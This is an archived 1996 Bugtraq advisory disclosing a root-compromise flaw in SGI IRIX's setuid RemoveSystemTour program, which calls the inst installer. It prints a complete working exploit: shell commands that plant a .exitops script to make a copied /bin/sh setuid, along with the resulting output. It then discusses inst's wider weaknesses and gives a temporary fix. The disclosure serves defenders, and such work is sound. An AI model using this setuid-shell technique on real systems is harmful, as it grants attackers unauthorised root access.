Bugtraq mailing list archives
(Another) vulnerability in new SGIs
From: hhui () stardot net (Tung-Hui Hu)
Date: Wed, 30 Oct 1996 15:15:30 -0500
Security vulnerability [SDN-5-sgi-systour] 30 October 1996 Desktop SGIs ship with a system tour pre-installed; it is the package "systour". After the user runs through the tour, the option is given to remove the tour from the hard disk. As the user does not have permission to run "versions(1M) remove", SGI writes a short program, called RemoveSystemTour, that is setuid and spawns a versions remove. The problem is, of course, when a malicious user notices that the tour is still lying around on the hard disk. Since "versions remove" is merely a call to inst(1M), and inst is a very configurable program-- allowing the user to specify not only logfiles, directories, and exit operation scripts, making a setuid call to inst must be done with greater caution than now. There are several ways to exploit RemoveSystemTour. Here I describe the easiest, and later on I describe other problems and fixes. PROBLEM. systour AFFECTS. SGI IRIX 5.3 and 6.2 with the systour package available. REQUIRED. account on server RISK. root compromise, denial of service, etc. --- Exploit: First, we set up an environment for running inst. dryrun is set to true because we are considerate environmentalists. $ rbase=$HOME; export rbase $ mkdir -p $HOME/var/inst $ echo "dryrun: true" > $HOME/.swmgrrc These three lines should be very familiar to all exploitors. $ cp -p /bin/sh /tmp/foobar $ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops $ chmod a+x $HOME/var/inst/.exitops Now run it. $ /usr/lib/tour/bin/RemoveSystemTour Executing outstanding exit-commands from previous session .. Successfully completed exit-commands from previous session. Reading installation history Checking dependencies ERROR: Software Manager: automatic installation failed: New target (nothing installed) and no distribution. --- DISCUSSION. The easiest solution is to replace RemoveSystemTour with a binary that checks the password. However, RemoveSystemTour may not be the only way to access inst, and so these general recommendations apply: inst should check UID and lock configuration options when called non- interactively from versions and with euid 0. inst also has a race condition on the file /tmp/shPID0, the shell script it creates to make the appropriate directory (rbase). inst should verify the variables it uses--by relying on an external shell script, environment variables, IFS, etc. can be tampered with. Finally, inst will happily overwrite logfiles specified in the .swmgrrc file and creat() the shell script over anything. --- TEMPORARY FIX. Either remove the system tour or chmod -s the RemoveSystemTour binary. ADDITIONAL COMMENTS. None. --- Tung-Hui Hu, hacker, comparative literature, Princeton Univ. hhui () stardot net
Current thread:
- Someone reminded me of something today ;) Alan Cox (Oct 30)
- Re: Someone reminded me of something today ;) carson () lehman com (Oct 30)
- (Another) vulnerability in new SGIs Tung-Hui Hu (Oct 30)
- Re: BoS: Someone reminded me of something today ;) Rick Weldon (Oct 30)